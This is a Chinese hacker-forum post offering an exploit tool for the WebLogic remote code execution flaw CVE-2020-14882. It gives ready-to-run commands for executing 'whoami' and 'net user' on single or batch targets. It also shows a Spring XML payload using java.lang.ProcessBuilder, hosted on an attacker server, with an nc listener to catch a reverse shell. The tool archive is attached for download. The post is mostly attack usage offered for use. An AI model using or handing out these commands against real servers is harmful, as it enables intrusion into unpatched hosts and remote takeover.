请选择
进入手机版
|
继续访问电脑版
用户登录
免费注册
设为首页
加入收藏
中国红客联盟 - 08安全团队组建
本版
用户
全站首页
社区首页
红盟自媒体
关于本站
反诈中心
家园
Space
排行榜
Ranklist
倡导绿色健康网络
关于我们
致—红盟会员
发展历程
核心人员
技术问答
Web文章
Web漏洞
图书馆
在线视频
反诈中心
Windows
Linux/MAC
无线安全
移动终端
资源分享
逆向破解
杀毒软件
浏览器
病毒样本
最新资讯
八卦水库
本站公告
职位申请
投诉举报
中国红客联盟 - 08安全团队组建
»
社区首页
›
技术攻防
›
漏洞情报
›
Weblogic远程代码执行-CVE-2020-14882
返回列表
查看:
11957
|
回复:
2
Weblogic远程代码执行-CVE-2020-14882
[复制链接]
90_
90_
当前离线
积分
10853
TA的每日心情
怒
昨天 11:19
签到天数: 1269 天
[LV.10]以坛为家III
发表于 2020-11-3 21:09:33
|
显示全部楼层
|
阅读模式
CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
需要模块:requests、http.client
功能一:命令回显
python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"
复制代码
python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"
复制代码
功能二:批量命令回显
python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
复制代码
target.txt 格式:
http://x.x.x.x:xx
,一行一个
功能三:外置xml文件无回显命令执行
1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
</list>
</constructor-arg>
</bean>
</beans>
复制代码
开启python监听
nc开启监听
2、使用-x选项指定xml文件路径,发送payload。
python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml
复制代码
3、成功接收shell
CVE-2020-14882_ALL-master.zip
(460.08 KB, 下载次数: 1, 售价: 3 i币)
2020-11-3 21:09 上传
点击文件名下载附件
CVE-2020-14882
回复
使用道具
举报
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表